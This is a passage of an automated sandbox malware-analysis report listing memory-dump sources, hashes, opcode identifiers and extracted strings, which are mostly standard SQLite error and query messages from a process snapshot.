                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-860711957
                                                                • Opcode ID: 223c30f72c7949f882983f5e48a9f91b3dbbbc23188e3268fe1ee460df065703
                                                                • Instruction ID: a727ca3feabb9c25be398bac77aeb0544aa0cca32bf2b1a70eb6ae49a3c2302f
                                                                • Opcode Fuzzy Hash: 223c30f72c7949f882983f5e48a9f91b3dbbbc23188e3268fe1ee460df065703
                                                                • Instruction Fuzzy Hash: AFB1E1B69047499FE7208F34DC4CB2777E4BF45319F21892CE98A8B242E775E4058BA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
                                                                • API String ID: 0-3324442540
                                                                • Opcode ID: 3d29d1c3e853fdc8f14248c39732f67c15b3896d39b8b3ae7fbbf40011a4c3a9
                                                                • Instruction ID: 390b3e57ed31a08f71f46b857851b1308bd94286c3e0e3537b5baf67cb86b8e9
                                                                • Opcode Fuzzy Hash: 3d29d1c3e853fdc8f14248c39732f67c15b3896d39b8b3ae7fbbf40011a4c3a9
                                                                • Instruction Fuzzy Hash: B881DF71A08252AFDB009F24EC84B6AB7E4FF453A5F05076AFD45A7221D735E810CBA3
                                                                Strings
                                                                • misuse, xrefs: 1D78E380
                                                                • API called with finalized prepared statement, xrefs: 1D78E36A
                                                                • %s at line %d of [%.10s], xrefs: 1D78E385
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D78E376
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3620335220
                                                                • Opcode ID: 55103e623d8c4bf8a485858d49f04c73da17fc738bd0a4364fbecdc9aae9a004
                                                                • Instruction ID: 0958fa7337932dde711c08d81f870898ad742d58688ff6d5746b5a2df826fd71
                                                                • Opcode Fuzzy Hash: 55103e623d8c4bf8a485858d49f04c73da17fc738bd0a4364fbecdc9aae9a004
                                                                • Instruction Fuzzy Hash: 90519370908611EBEB019F24DCC8B6A3774AF023AAF058566FD099B252D736E554CFA3
                                                                Strings
                                                                • misuse, xrefs: 1D8374D7
                                                                • API call with %s database connection pointer, xrefs: 1D8374C1
                                                                • unable to close due to unfinalized statements or unfinished backups, xrefs: 1D8375D1
                                                                • %s at line %d of [%.10s], xrefs: 1D8374DC
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D8374CD
                                                                • invalid, xrefs: 1D8374BC
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                • API String ID: 0-3800776574
                                                                • Opcode ID: d9a5d75cfd85add4a95580dd1b8cf5f457557cad33a6db2bbfc20a8623b81834
                                                                • Instruction ID: c9941a259d20c3c97ecefaa7611962f017da14a269339bda7b423913b6bb5792
                                                                • Opcode Fuzzy Hash: d9a5d75cfd85add4a95580dd1b8cf5f457557cad33a6db2bbfc20a8623b81834
                                                                • Instruction Fuzzy Hash: 16513875904711BBDB11AB28EC88B7B77A5AF81316F050528F99E93202F734F552CAE3
                                                                Strings
                                                                • SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1D7DBD67
                                                                • PRAGMA %Q.page_size, xrefs: 1D7DBD03
                                                                • undersize RTree blobs in "%q_node", xrefs: 1D7DBDA1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
                                                                • API String ID: 0-3485589083
                                                                • Opcode ID: 8a1c400147d33ca9dd8ac89c657f3048cc17d3a5bb7022c81ae59595e0dbca63
                                                                • Instruction ID: f14bbcefbdbcd40a95a0fc6dfad5e10d62b2e3366bdeb98cd917be8ac44d1191
                                                                • Opcode Fuzzy Hash: 8a1c400147d33ca9dd8ac89c657f3048cc17d3a5bb7022c81ae59595e0dbca63
                                                                • Instruction Fuzzy Hash: 6C31E6B1904711EFD3008B24DC84B7677B8FB453AAF01426AF94996212D736E954CFB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: b80c1e09083fd4cd533d8fce82ff9fc32bfc75b4791566c7d5c3622dc9acded0
                                                                • Instruction ID: c4c12fbcff17eba9a876848c6a063d2a9be83c8054c8c30979e2218233d0c5f1
                                                                • Opcode Fuzzy Hash: b80c1e09083fd4cd533d8fce82ff9fc32bfc75b4791566c7d5c3622dc9acded0
                                                                • Instruction Fuzzy Hash: 74F11474608651AFD300DF28D880BA6BBF0FF45256F4482A9E94C8B352E735F955CBE2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %c%04d-%02d-%02d %02d:%02d:%06.3f$abort due to ROLLBACK$another row available$d$no more rows available$unknown error
                                                                • API String ID: 0-322231948
                                                                • Opcode ID: 658b08da27a00357e71b9b6aa6e127c347e57151dd867846f13b08b911e8bc34
                                                                • Instruction ID: 1e4de3edcc2af1ad5697082fe9fc396d3864bb2a26abdc036ab75bd7cf31a279
                                                                • Opcode Fuzzy Hash: 658b08da27a00357e71b9b6aa6e127c347e57151dd867846f13b08b911e8bc34
                                                                • Instruction Fuzzy Hash: 1FE1CF716083409BD700CF24C888B6BB7E5BF89324F508D6EF98997251E776E945CB93
                                                                Strings
                                                                • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1D7629F1
                                                                • unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 1D762AA0
                                                                • malformed inverted index for FTS5 table %s.%s, xrefs: 1D762A8A
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
                                                                • API String ID: 0-3572959941
                                                                • Opcode ID: 4e2954930bef86bd81090d263ab0712b5477e54ebd4e12221077de1898139419
                                                                • Instruction ID: b4eae0002e9d903e2cf32701c82545a98a7402d2b089e10a369713bd694961d4
                                                                • Opcode Fuzzy Hash: 4e2954930bef86bd81090d263ab0712b5477e54ebd4e12221077de1898139419
                                                                • Instruction Fuzzy Hash: 9941E671909221AFE3109F24DCC8FA777B8EF462A5F14022AFD4586211E7359654CFB7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 9e3064ac3974d7689fb439b938f161ea6c859233a8b818e5196013bea536676b
                                                                • Instruction ID: 4164e0c7336fb20bbe3d9e71cb2468192d4885478a72e3a5b890a1a2eedebab2
                                                                • Opcode Fuzzy Hash: 9e3064ac3974d7689fb439b938f161ea6c859233a8b818e5196013bea536676b
                                                                • Instruction Fuzzy Hash: 14B11A75A083609FC305CF19D8805ABFBE0EFC4215F4946AEF5899B243E235E549CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: b0cab5808183c23c33e2d3e7a1d81a66cfc626b137499801e8e1feced30754e2
                                                                • Instruction ID: 6882a14ec6cad10536061a494c3478553d4c233bb7e86fce23f99998336c0adf
                                                                • Opcode Fuzzy Hash: b0cab5808183c23c33e2d3e7a1d81a66cfc626b137499801e8e1feced30754e2
                                                                • Instruction Fuzzy Hash: 2C91183160C2956FC304EE2DE8905FABBD0EB95225F9445BFF9D887283E129D509C7A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (FK)
                                                                • API String ID: 0-1642768157
                                                                • Opcode ID: 3093d856b918401c2f0dbe56f76a7579aab1a088a60777cfd31740bdda6679ac
                                                                • Instruction ID: 4afdf8bb03320c2706d3264e7d099dca7ae352d7239c3a9d4f9cd501a1ad513a
                                                                • Opcode Fuzzy Hash: 3093d856b918401c2f0dbe56f76a7579aab1a088a60777cfd31740bdda6679ac
                                                                • Instruction Fuzzy Hash: 4481C5B67092009FD7019F28EC40B66F3A1FF85236F21876FE64A876A1E732E550D752
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s-shm$readonly_shm$winOpenShm
                                                                • API String ID: 0-2815843928
                                                                • Opcode ID: 97b2668d9c951efae7c9caafd31f6e9d056735f8ec8e56229e2b8f451f66e555
                                                                • Instruction ID: 3237b7323ff12e915930d7ff16b9b1b609a84469ec11b7629fc9221941371bad
                                                                • Opcode Fuzzy Hash: 97b2668d9c951efae7c9caafd31f6e9d056735f8ec8e56229e2b8f451f66e555
                                                                • Instruction Fuzzy Hash: 0391DCB0918311EBDB109F24DC84BA777B8FB013A5F054269FD459B251EB39E918CBA3
                                                                Strings
                                                                • %.*s%s, xrefs: 1D75EC88
                                                                • %s at line %d of [%.10s], xrefs: 1D75ECDA
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D75ECCB
                                                                • database corruption, xrefs: 1D75ECD5
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-894757972
                                                                • Opcode ID: 7078cb8a68e23bd2ec029b602761169878eb91db9d8514a4feefb1690a620896
                                                                • Instruction ID: cf83f0c32dc3320f426e9d55cfa5d6f73e9c7ce5908b5f2e6d0c9063a7419ee6
                                                                • Opcode Fuzzy Hash: 7078cb8a68e23bd2ec029b602761169878eb91db9d8514a4feefb1690a620896
                                                                • Instruction Fuzzy Hash: EA61F4B5A083419FD714CF18C880AABB7E2BF84724F058D6EE8599B351E731E945CB93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: c1d0e4948b5e59f4197724b43424b28442281790dde098dd1e2c24ac3a2d7248
                                                                • Instruction ID: 2735d46f0a2ed2b429f72d609ee8976d17445b3e80fb6f363e9d9f450cfdb13f
                                                                • Opcode Fuzzy Hash: c1d0e4948b5e59f4197724b43424b28442281790dde098dd1e2c24ac3a2d7248
                                                                • Instruction Fuzzy Hash: ED51E276304250ABC300EF18DC84AB7B7E0EBC8265F95886EF589C7652E375E5858763
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
